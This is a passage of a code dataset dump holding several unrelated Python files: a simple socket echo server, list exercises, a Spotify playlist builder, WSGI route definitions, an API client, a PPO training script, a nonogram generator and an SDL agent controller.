1\n\t\tprint ('Optimization Finished')\n\t\tprint ('Accuracy:', accuracy.eval({x: test_x, y: test_y, keep_prob: 1.}))\n\t\t# Saving the model\n\t\tif not os.path.exists('model'):\n\t\t\tos.makedirs('model')\n\t\tsaver.save(sess, 'model/model')\n\t\tprint ('Model Saved')\n","sub_path":"tf_multi_perceptron.py","file_name":"tf_multi_perceptron.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204781190","text":"\n#\n# Directions\n# \nDIR_NONE = 0\nDIR_RIGHT = 1\nDIR_LEFT = 2\n#\n# Section states\n#\nSECTION_EMPTY = 0\nSECTION_BLOCKED = 1\nSECTION_BOOKED = 2\nSECTION_CLEAR = 3\nSECTION_OCCUPIED = 4\nSECTION_STOPPING = 5\nSECTION_CONTINUING = 6\nSECTION_STARTING = 7\nSECTION_STOPPED = 8\nSECTION_LEAVING = 9\nSECTION_TERMINATING = 10\nSECTION_TERMINATED = 11\nSECTION_BASE_LAST = 
12\n\n","sub_path":"symbols.py","file_name":"symbols.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"406943434","text":"import socket\nimport os\nfrom _thread import*\n\ns = socket.socket()\nhost=''\nport =8889\nThreadCount=0\ntry:\n\ts.bind((host,port))\nexcept socket.error as e:\n\tprint(str(e))\n\nprint(\"Waiting for connection...\")\ns.listen(5)\n\ndef threaded_client(connection):\n\tconnection.send(str.encode(\"Welcome Genshin Global server\\n\"))\n\twhile True:\n\t\tdata = connection.recv(2048)\n\t\treply = \"Server said: \"+data.decode('utf-8')\n\t\tif not data:\n\t\t\tbreak\n\t\tconnection.sendall(str.encode(reply))\n\tconnection.close()\n\nwhile True:\n\tClient, address = s.accept()\n\tprint(\"Connected to: \"+address[0]+\":\"+str(address[1]))\n\tstart_new_thread(threaded_client,(Client,))\n\tThreadCount+=1\n\tprint(\"Thread Number: \"+str(ThreadCount))\ns.close()\n","sub_path":"5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"335515246","text":"'''\nproblem 1\n'''\n#function prList(arr): arr is a list; print each of its elements, separated by commas\n#e.g. prList([10, 20, 30, 40, 50]) prints 10, 20, 30, 40, 50\n\na = [10,20,30,40,50]\ndef prList(arr):\n #index is last one , then println. otherwise,\",\"\n for idx,el in enumerate(arr):\n if (idx != len(arr)-1):\n print(el,end=\",\")\n else:\n print(el)\nb = [30,4,56]\nprint(prList(a))\nprint(prList(b))\n\n'''\nprob 2\n'''\n#function enumList(arr): arr is a list; print each element on its own line, prefixed with its number.\n#e.g. enumList(['apple', 'orange', 'banana']) prints:\n#1. apple\n#2. orange\n#3. banana\ndef enumList(arr):\n for idx,el in enumerate(arr):\n print(idx+1,'. ',el)\nenumList(['apple', 'orange', 'banana'])\n\n# we can also use 'Format' !!\ndef enumList2(arr):\n for idx,el in enumerate(arr):\n print(\"{}. 
{}\".format(idx+1,el))\nenumList2(['apple','orange','banana'])","sub_path":"list_enumerate.py","file_name":"list_enumerate.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354864717","text":"import logging\nimport os\nfrom typing import List\n\nimport requests\nfrom google.cloud import bigquery\n\nfrom playlist_maker.auto_playlists import AutoPlaylist\nfrom playlist_maker.tokenito import get_token\nfrom playlist_maker.types import NotifierMessage\n\nlogger = logging.getLogger(__name__)\n\n\nclass LatestReleases(AutoPlaylist):\n def get_tracks(self):\n query = \"\"\"\n SELECT a.artist_id, a.latest_release_date , a.latest_release_uri \n FROM `rapsodie.rapsodie_main.spotify_artist_page` a\n INNER JOIN (\n SELECT artist_id, max(latest_release_date) latest_release_date\n FROM `rapsodie.rapsodie_main.spotify_artist_page` \n GROUP BY artist_id\n ) b ON a.artist_id = b.artist_id AND a.latest_release_date = b.latest_release_date\n where cast(a.latest_release_date as DATE) between DATE_SUB(current_date(), INTERVAL 0 DAY) and current_date()\n order by a.latest_release_date desc\n \"\"\"\n bq_client = bigquery.Client()\n rows = bq_client.query(query).result()\n s_token = get_token()\n tracks = []\n for row in rows:\n album_id = row[2].replace(\"spotify:album:\", \"\")\n album_id = album_id.replace('\"', \"\")\n url = f\"https://api.spotify.com/v1/albums/{album_id}/tracks?country=FR&limit=50&offset=0\"\n response = requests.get(url, headers={\"Authorization\": f\"Bearer {s_token}\"})\n response_body = response.json()\n for track in response_body[\"items\"]:\n tracks.append(track[\"id\"])\n return tracks\n\n def get_announcements(self) -> List[NotifierMessage]:\n return []\n","sub_path":"playlist_maker/auto_playlists/LatestReleases.py","file_name":"LatestReleases.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"530907105","text":"# -*- coding:utf-8 -*-\r\n\"\"\"\r\nCreated on 2016-3-18\r\n\r\n@author: gaga\r\n\"\"\"\r\n\r\n\"\"\"\r\nWSGI middleware\r\n\"\"\"\r\n\r\nfrom oslo_config import cfg\r\nfrom oslo_log import log as logging\r\nimport routes\r\nfrom naas.api import wsgi as base_wsgi\r\nfrom naas.api.controller import node\r\nfrom naas.api.controller import endpoint\r\nfrom naas.api.controller import agent\r\nfrom naas.api.controller import network_type\r\nfrom naas.api.controller import tunnel\r\nfrom naas.api.controller import switch\r\nfrom naas.api.controller import task\r\nfrom naas.api.controller import other\r\n\r\n\r\nCONF = cfg.CONF\r\nLOG = logging.getLogger(__name__)\r\n\r\n\r\nclass APIMapper(routes.Mapper):\r\n def routematch(self, url=None, environ=None):\r\n if url == \"\":\r\n result = self._match(\"\", environ)\r\n return result[0], result[1]\r\n return routes.Mapper.routematch(self, url, environ)\r\n\r\n def connect(self, *args, **kargs):\r\n # NOTE(vish): Default the format part of a route to only accept json\r\n # and xml so it doesn't eat all characters after a '.'\r\n # in the url.\r\n kargs.setdefault('requirements', {})\r\n if not kargs['requirements'].get('format'):\r\n kargs['requirements']['format'] = 'json|xml'\r\n return routes.Mapper.connect(self, *args, **kargs)\r\n\r\n\r\nclass BaseRouter(base_wsgi.Router):\r\n \"\"\"Routes requests on the Naas API to the appropriate controller\r\n and method.\r\n \"\"\"\r\n ExtensionManager = None # override in subclasses\r\n\r\n 
@classmethod\r\n def factory(cls, global_config, **local_config):\r\n \"\"\"Simple paste factory, :class:`naas.api.wsgi.Router` doesn't have one.\"\"\"\r\n return cls()\r\n\r\n def __init__(self, ext_mgr=None, init_only=None):\r\n mapper = APIMapper()\r\n self.resources = {}\r\n self._setup_routes(mapper)\r\n super(BaseRouter, self).__init__(mapper)\r\n\r\n def _setup_routes(self, mapper):\r\n raise NotImplementedError()\r\n\r\n\r\nclass APIRouter(BaseRouter):\r\n \"\"\"Routes requests on the Naas API to the appropriate controller\r\n and method.\r\n \"\"\"\r\n\r\n def _setup_routes(self, mapper):\r\n \"\"\"\r\n URL mapping:\r\n 1. node: node URL routes\r\n \"\"\"\r\n\r\n self.resources['node'] = node.create_resource()\r\n\r\n mapper.connect(\"/naas/node/list\",\r\n controller=self.resources['node'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/node/create\",\r\n controller=self.resources['node'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/node/detail/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/node/update/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/node/delete/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 2. endpoint: endpoint URL routes\r\n \"\"\"\r\n\r\n self.resources['endpoint'] = endpoint.create_resource()\r\n\r\n mapper.connect(\"/naas/endpoint/list\",\r\n controller=self.resources['endpoint'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint/create\",\r\n controller=self.resources['endpoint'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/endpoint/detail/{endpoint_id}\",\r\n controller=self.resources['endpoint'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint/update/{endpoint_id}\",\r\n controller=self.resources['endpoint'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/endpoint/delete/{endpoint_id}\",\r\n controller=self.resources['endpoint'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 3. agent: network agent URL routes\r\n \"\"\"\r\n\r\n self.resources['agent'] = agent.create_resource()\r\n\r\n mapper.connect(\"/naas/agent/list\",\r\n controller=self.resources['agent'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/agent/create\",\r\n controller=self.resources['agent'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/agent/delete/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/agent/update/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/agent/detail/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/agent/{agent_id}/tunnel_point\",\r\n controller=self.resources['agent'],\r\n action=\"tunnel_point\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 4. tunnel: dedicated-line tunnel URL routes\r\n \"\"\"\r\n\r\n self.resources['tunnel'] = tunnel.create_resource()\r\n\r\n mapper.connect(\"/naas/tunnel/list\",\r\n controller=self.resources['tunnel'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/tunnel/detail/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/tunnel/create\",\r\n controller=self.resources['tunnel'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/tunnel/update/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/tunnel/delete/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 5. switch: switch URL routes\r\n \"\"\"\r\n\r\n self.resources['switch'] = switch.create_resource()\r\n\r\n mapper.connect(\"/naas/switch/list\",\r\n controller=self.resources['switch'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/create\",\r\n controller=self.resources['switch'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/switch/detail/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/update/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/switch/delete/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/switch/{switch_id}/switch_port\",\r\n controller=self.resources['switch'],\r\n action=\"list_switch_port\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/create\",\r\n controller=self.resources['switch'],\r\n action=\"create_switch_port\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"manage_switch_port\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/delete/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"delete_switch_port\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/switch/{switch_id}/switch_port/list_unused/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"list_unused\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 6. task: task URL routes\r\n \"\"\"\r\n\r\n self.resources['task'] = task.create_resource()\r\n mapper.connect(\"/naas/task/list\",\r\n controller=self.resources['task'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/task/detail/{task_id}\",\r\n controller=self.resources['task'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 7. network_type: network type URL routes\r\n \"\"\"\r\n\r\n self.resources['network_type'] = network_type.create_resource()\r\n\r\n mapper.connect(\"/naas/network_type/list\",\r\n controller=self.resources['network_type'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n URL mapping:\r\n 8. other: miscellaneous function URL routes\r\n \"\"\"\r\n\r\n self.resources['other'] = other.create_resource()\r\n\r\n mapper.connect(\"/naas/network_map\",\r\n controller=self.resources['other'],\r\n action=\"network_map\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint_plugin\",\r\n controller=self.resources['other'],\r\n action=\"endpoint_plugin\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint_distance\",\r\n controller=self.resources['other'],\r\n action=\"endpoint_distance\",\r\n conditions={\"method\": ['GET']})\r\n\r\n\r\n\r\n\r\n","sub_path":"naas/api/api/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":11407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"36549343","text":"import requests\nfrom hanga.utils import TrackedFile\nfrom json import dumps\nfrom os import environ\nfrom os.path import join\n\n\nclass HangaException(Exception):\n pass\n\n\nclass HangaAPI(object):\n \"\"\"API to communicate with Hanga\"\"\"\n\n def __init__(self, key=None, url=None):\n super(HangaAPI, self).__init__()\n self._url = url or environ.get(\"HANGA_URL\", \"https://hanga.io\")\n self._key = key or environ.get(\"HANGA_API_KEY\")\n if not self._key:\n raise HangaException(\"Missing Hanga API Key\")\n if not self._url.endswith(\"/\"):\n self._url += \"/\"\n\n def submit(self, args, filename, callback=None):\n \"\"\"Submit a packaged app to build. Filename should point to a\n structured zip containing the app, buildozer.spec adjusted for it,\n and other deps if needed. Args should be the line used for building\n the app.\n\n The result is a dict that contains::\n\n {\n \"result\": \"ok\",\n \"uuid\": \"f18cafae-c730-11e3-add4-04011676f501\",\n }\n\n Or if there is a failure::\n\n {\n \"result\": \"error\",\n \"details\": \"Something bad happened\"\n }\n\n \"\"\"\n fd = None\n try:\n fd = TrackedFile(filename, callback=callback)\n params = {\"args\": dumps(args)}\n r = self._build_request(\n requests.post, \"submit\", data=fd, params=params, stream=True)\n finally:\n if fd:\n fd.close()\n\n return r.json()\n\n def download(self, uuid, dest_dir, callback=None):\n \"\"\"Download the result of a job build. If a callback is passed, it will\n be called with the size of the content received and the total size of\n the content.\n\n Return the filename within dest_dir.\n \"\"\"\n r = self._build_request(requests.get,\n \"{}/dl\".format(uuid), stream=True)\n\n # ensure the name is shared in the content-disposition\n disposition = r.headers.get(\"content-disposition\")\n if not disposition or not disposition.startswith(\"attachment;\"):\n raise HangaException(\"File not attached, nothing to download\")\n filename = disposition.split(\"filename=\", 1)[-1]\n if not filename:\n raise HangaException(\"Empty filename\")\n\n dest_fn = join(dest_dir, filename)\n index = 0\n length = int(r.headers.get(\"Content-Length\"))\n if callback:\n callback(0, length)\n with open(dest_fn, \"wb\") as fd:\n for content in r.iter_content(chunk_size=8192):\n fd.write(content)\n index += len(content)\n if callback:\n callback(index, length)\n\n return filename\n\n def status(self, uuid):\n \"\"\"Return the status of a job, in the form of a dictionary::\n\n {\n \"result\": \"ok\",\n \"job_status\": \"packaging\",\n \"job_progression\": \"78\"\n }\n\n The `result` can be either \"ok\" or \"error\" if something happens.\n The `job_status` can be a lot of things, depending on the Hanga \n version running. 
It ends only with a status of \"done\" or \"error\".\n \"\"\"\n r = self._build_request(requests.get, \"{}/status\".format(uuid))\n return r.json()\n\n def _build_request(self, method, path, **kwargs):\n url = \"{}api/1/{}\".format(self._url, path)\n headers = {\"X-Hanga-Api\": self._key}\n r = method(url, headers=headers, **kwargs)\n r.raise_for_status()\n return r\n","sub_path":"hanga/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85002413","text":"\"\"\"\nusing dataset and dataloader instead of np.random.choice\nimplementation of PPO algo for MuJoCo Environment\nPaper:[62] Schulman J, Wolski F, Dhariwal P, et al. Proximal Policy Optimization Algorithms.[J]. arXiv: Learning, 2017.\n\nTODO: change to MuJoCo version\n\"\"\"\n\nimport os\nimport gym\nimport ray\nimport click\nimport torch\nimport time\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport torch.nn.functional as F\n\nfrom torch import autograd\nfrom torch.utils.data import Dataset, DataLoader\nfrom util.preprocess2015 import ProcessUnit\nfrom util.model import Policy2013, Value\nfrom util.tools import save_record\n\ncpu_device = torch.device(\"cpu\")\ndevice = cpu_device\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nstorage_path = \"../results\"\nEPS = 1e-10\n\n\nclass args(object):\n FrameSkip = 4\n Gamma = 0.99\n # GAE parameter\n Lambda = 0.95\n # Horizon(train frame)\n Llocal = 128\n # Num epochs\n K = 3\n # Tmax: 40M\n Tmax = int(40e6)\n actor_number = 8 \n generation = 1000000\n # adam's stepsize 2.5 * 10^-4\n stepsize = 2.5e-4\n stepsize0 = stepsize\n # Loss hyperparameter\n c1 = 1\n c2 = 0.01\n #minibatch_size = 32*8\n minibatch_size = 32*8\n # clip parameter\n epsilon = 0.1 \n epsilon0 = epsilon\n seed = 124\n layer_norm = True\n state_norm = True\n advantage_norm = True \n lossvalue_norm = True\n\n @classmethod\n def update(cls, current_frames):\n ratio = 1 - current_frames / cls.Tmax\n cls.stepsize = cls.stepsize0 * ratio\n cls.epsilon = cls.epsilon0 * ratio\n\n\n@ray.remote\nclass Simulator(object):\n \"\"\"\n simulator can be used for training data collection and performance test.\n If you define a Simulator for training data collection, you should not use it for testing.\n \"\"\"\n def __init__(self, gamename):\n self.env = gym.make(gamename)\n #self.env.seed(args.seed)\n self.obs = self.env.reset()\n self.start = False\n self.record = {\n \"episode\":[],\n \"steps\":[],\n \"reward\":[],\n \"gamelength\":[]\n }\n self.reward = 0\n self.gamelength = 0\n\n def start_game(self, episode, steps):\n no_op_frames = np.random.randint(1,30)\n self.pu = ProcessUnit(4, args.FrameSkip)\n obs = self.env.reset()\n self.pu.step(obs)\n for i in range(no_op_frames):\n obs, r, done, _ = self.env.step(0)\n self.pu.step(obs)\n if done:\n return False\n self.start = True\n self.record['episode'].append(episode)\n self.record['steps'].append(steps)\n self.record['reward'].append(self.reward)\n self.record['gamelength'].append(self.gamelength)\n self.reward = 0\n self.gamelength = 0\n return True\n\n def get_records(self):\n return self.record\n\n def add_record(self, r):\n self.reward += r\n self.gamelength += 1\n\n def rollout(self, actor, critic, Llocal, episode, steps):\n \"\"\"\n if Llocal is None: test mission\n else: collect data\n \"\"\"\n while not self.start:\n self.start_game(episode, steps)\n if Llocal is None:\n self.start_game(episode, steps)\n\n Lmax = 
108000 if Llocal is None else Llocal\n frame_list = []\n action_list = []\n done_list = []\n reward_list = []\n # the probability of choosing action at\n probability_list = []\n break_or_not = False\n reward = 0\n for i in range(Lmax):\n frame_now = self.pu.to_torch_tensor()\n # stochastic policy\n action, prob = actor.act_with_prob(frame_now)\n r_ = 0\n for j in range(args.FrameSkip):\n obs, r, done, _ = self.env.step(action)\n r_ += r\n reward += r\n self.pu.step(obs)\n\n # it's for recording\n self.add_record(r)\n \n if done:\n break_or_not = True\n break\n if Llocal is not None:\n frame_list.append(frame_now)\n action_list.append(action)\n done_list.append(0 if done else 1)\n reward_list.append(r_)\n probability_list.append(prob)\n if break_or_not:\n self.start = False\n break\n if Llocal is None:\n # for testing models\n return reward\n # for collecting data\n frame_list = frame_list[::-1]\n action_list = action_list[::-1]\n reward_list = reward_list[::-1]\n probability_list = probability_list[::-1]\n done_list = done_list[::-1]\n # value's output\n value_list = []\n for idx, frame in enumerate(frame_list):\n value_list.append(critic(frame))\n\n delta_list = []\n advantage_list = []\n Value_target_list = []\n # previous discounted return\n prev_return = 0\n prev_value = 0\n prev_advantage = 0\n\n for i in range(len(reward_list)):\n Value_target_list.append(reward_list[i]+args.Gamma*prev_return*done_list[i])\n delta_list.append(reward_list[i]+args.Gamma*prev_value*done_list[i]-value_list[i])\n assert delta_list[i] == delta_list[-1]\n advantage_list.append(delta_list[i] + args.Gamma*args.Lambda*prev_advantage*done_list[i])\n\n prev_return = Value_target_list[i]\n prev_value = value_list[i]\n prev_advantage = advantage_list[i]\n\n # if args.advantage_norm:\n # mb_advan = (mb_advan - mb_advan.mean()) / (mb_advan.std() + EPS)\n return [frame_list, action_list, probability_list, advantage_list, Value_target_list]\n\n\nclass RLDataset(Dataset):\n \"\"\"\n dataset for RL data:\n\n 1. state\n 2. action\n 3. action probability\n 4. advantage estimator\n 5. 
target value(critic)\n ...\n \"\"\"\n def __init__(self, data_list):\n super(RLDataset, self).__init__()\n self.data_list = data_list\n # the element of data_list should be torch.Tensor\n self.length = self.data_list[0].shape[0]\n\n def __getitem__(self, i):\n return [d[i] for d in self.data_list]\n\n def __len__(self):\n return self.length\n\n@click.command()\n@click.option(\"--gamename\")\ndef main(gamename):\n start_time = time.time()\n env = gym.make(gamename)\n action_n = env.action_space.n\n critic = Value().to(device)\n actor = Policy2013(action_n).to(device)\n simulators = [Simulator.remote(gamename) for i in range(args.actor_number)]\n\n actor_optm = torch.optim.Adam(actor.parameters(), lr=args.stepsize)\n critic_optm = torch.optim.Adam(critic.parameters(), lr=args.stepsize)\n\n frame_count = 0\n\n for g in range(args.generation):\n # train simulator and test simulator will not use the same variable\n rollout_ids = [s.rollout.remote(actor.to(cpu_device), critic.to(cpu_device), args.Llocal, g, frame_count) for s in simulators]\n frame_list = []\n action_list = []\n prob_list = []\n advantage_list = []\n value_list = []\n \n for rollout_id in rollout_ids:\n rollout = ray.get(rollout_id)\n frame_list.extend(rollout[0])\n action_list.extend(rollout[1])\n prob_list.extend(rollout[2])\n advantage_list.extend(rollout[3])\n value_list.extend(rollout[4])\n\n actor.to(device)\n critic.to(device)\n batch_size = len(advantage_list)\n frame_t = torch.cat(frame_list)\n action_t = torch.Tensor(action_list).long()\n prob_t = torch.Tensor(prob_list).float()\n advantage_t = torch.Tensor(advantage_list).float()\n critic_target = torch.Tensor(value_list).float()\n\n if args.advantage_norm:\n advantage_t = (advantage_t - advantage_t.mean())/(advantage_t.std() + EPS)\n\n dataset = RLDataset([frame_t, action_t, prob_t, advantage_t, critic_target])\n dataloader = DataLoader(dataset, batch_size=args.minibatch_size, shuffle=True, num_workers=4)\n for batch_idx in range(args.K):\n for data_l in dataloader:\n # mb means minibatch \n mb_size = data_l[0].shape[0]\n mb_state = data_l[0].to(device)\n mb_action = data_l[1].to(device)\n mb_prob = data_l[2].to(device)\n mb_advan = data_l[3].to(device)\n mb_critic_target = data_l[4].to(device)\n\n with autograd.detect_anomaly():\n \n mb_new_prob = actor.return_prob(mb_state).to(device)\n mb_old_prob = mb_prob.reshape(mb_size, 1).mm(torch.ones(1, action_n).to(device))\n # CLIP Loss\n prob_div = mb_new_prob / mb_old_prob\n mb_advan_square = mb_advan.reshape(mb_size, 1).mm(torch.ones(1, action_n).to(device))\n CLIP_1 = prob_div * mb_advan_square\n CLIP_2 = prob_div.clamp(1-args.epsilon, 1+args.epsilon) * mb_advan_square\n # - is for nll_loss\n loss_clip = - F.nll_loss(torch.Tensor.min(CLIP_1, CLIP_2), mb_action)\n # entropy loss: -p*ln(p)\n # +EPS for the existence of Nan in actor model in backpropagation\n loss_entropy = - (torch.Tensor.log2(mb_new_prob+EPS) * mb_new_prob).sum() / mb_size\n actor_loss = -(loss_clip+args.c2*loss_entropy)\n \n actor_optm.zero_grad()\n actor_loss.backward()\n actor_optm.step()\n\n # VF loss\n mb_value_predict = critic(mb_state).flatten()\n loss_value = torch.Tensor.mean((mb_critic_target-mb_value_predict).pow(2))\n critic_loss = loss_value\n with autograd.detect_anomaly():\n critic_optm.zero_grad()\n critic_loss.backward()\n critic_optm.step()\n \n #print(loss_clip)\n #print(loss_value)\n #print(loss_entropy)\n\n frame_count += batch_size * args.FrameSkip\n args.update(frame_count)\n # update optim's learning rate\n for gg in 
actor_optm.param_groups:\n gg['lr'] = args.stepsize\n for gg in critic_optm.param_groups:\n gg['lr'] = args.stepsize\n if g % 10 == 0:\n print(\"Gen %s | progress percent:%.2f | time %.2f\" % (g, frame_count/args.Tmax*100, time.time()-start_time))\n print(\"Gen %s | progress %s/%s | time %.2f\" % (g, frame_count, args.Tmax, time.time()-start_time))\n\n if frame_count > args.Tmax:\n break\n\n if g % 10 == 0:\n records_id = [s.get_records.remote() for s in simulators]\n save_record(records_id, storage_path, 'ppo-record-%s.csv' % gamename)\n torch.save(actor.state_dict(), storage_path+\"/ppo_actor_\"+gamename+'.pt')\n\n # after training\n records_id = [s.get_records.remote() for s in simulators]\n save_record(records_id, storage_path, 'ppo-record-%s.csv' % gamename)\n torch.save(actor.state_dict(), storage_path+\"/ppo_actor_\"+gamename+'.pt')\n\n\nif __name__ == \"__main__\":\n ray.init()\n main()\n\n\n","sub_path":"code/ppo2_mujoco.py","file_name":"ppo2_mujoco.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"162142331","text":"#!/usr/bin/env python3\n\nimport nono\nimport nonogen\nimport random\n\nif __name__ == \"__main__\":\n grid = nono.NonoGrid(random.choice(range(5, 20)), random.choice(range(5,20)))\n\n nonogen.gen_perlin(grid)\n\n grid.gen_hints()\n\n print(f\"{grid.type} \\n{grid}\")\n\n grid.to_picture(\"nonogrid.jpg\")\n grid.to_picture(\"nonogrid_solved.jpg\", has_value_color=\"orange\")\n","sub_path":"nonogen/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"28573381","text":"import ctypes\r\n\r\nimport sdl2\r\n\r\nfrom Model.Agent import Agent as ModelAgent\r\nfrom Model.Target import Target as Target\r\nfrom Vector2 import Vector2 as Vector2\r\n\r\n\r\nclass Agent:\r\n def __init__(self, agents, targets):\r\n self.agents = agents\r\n self.targets = targets\r\n self.speed = 1\r\n\r\n def handle_event(self, event):\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_1:\r\n self.speed = 1\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_2:\r\n self.speed = 2\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_3:\r\n self.speed = 3\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_4:\r\n self.speed = 4\r\n if event.type == sdl2.SDL_KEYDOWN:\r\n if event.key.keysym.sym == sdl2.SDLK_5:\r\n self.speed = 5\r\n\r\n if event.type == sdl2.SDL_MOUSEBUTTONDOWN:\r\n point = Vector2(ctypes.c_int(0), ctypes.c_int(0))\r\n sdl2.mouse.SDL_GetMouseState(ctypes.byref(point.x), ctypes.byref(point.y))\r\n point = Vector2(point.x.value, point.y.value)\r\n\r\n if event.button.button == sdl2.SDL_BUTTON_LEFT:\r\n self.agents.append(ModelAgent(Vector2(point.x, point.y), self.speed))\r\n\r\n if event.button.button == sdl2.SDL_BUTTON_RIGHT:\r\n self.targets.append(Target(Vector2(point.x, point.y)))\r\n\r\n def reset(self):\r\n del self.agents[:]\r\n del self.targets[:]\r\n self.speed = 1\r\n","sub_path":"PLDijkstraPathfindingVisualization/Pathfinding/Controller/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"343094610","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE'] = 'MedQuipSite.settings'\n\nfrom Products.models import 
